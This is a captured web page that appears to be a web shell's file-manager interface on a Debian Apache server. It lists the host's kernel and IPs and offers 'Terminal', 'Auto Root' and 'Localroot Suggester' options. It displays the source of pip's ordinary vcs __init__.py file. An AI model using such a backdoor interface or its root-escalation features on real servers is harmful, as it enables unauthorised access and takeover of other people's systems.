Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
pip /
_internal /
vcs /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2025-10-28 07:06
__init__.py
596
B
-rw-r--r--
2023-02-19 14:19
bazaar.py
3.44
KB
-rw-r--r--
2023-02-19 14:19
git.py
17.69
KB
-rw-r--r--
2023-02-19 14:19
mercurial.py
5.12
KB
-rw-r--r--
2023-02-19 14:19
subversion.py
11.45
KB
-rw-r--r--
2023-02-19 14:19
versioncontrol.py
22.28
KB
-rw-r--r--
2023-02-19 14:19
Save
Rename
# Expose a limited set of classes and functions so callers outside of # the vcs package don't need to import deeper than `pip._internal.vcs`. # (The test directory may still need to import from a vcs sub-package.) # Import all vcs modules to register each VCS in the VcsSupport object. import pip._internal.vcs.bazaar import pip._internal.vcs.git import pip._internal.vcs.mercurial import pip._internal.vcs.subversion # noqa: F401 from pip._internal.vcs.versioncontrol import ( # noqa: F401 RemoteNotFoundError, RemoteNotValidError, is_url, make_vcs_requirement_url, vcs, )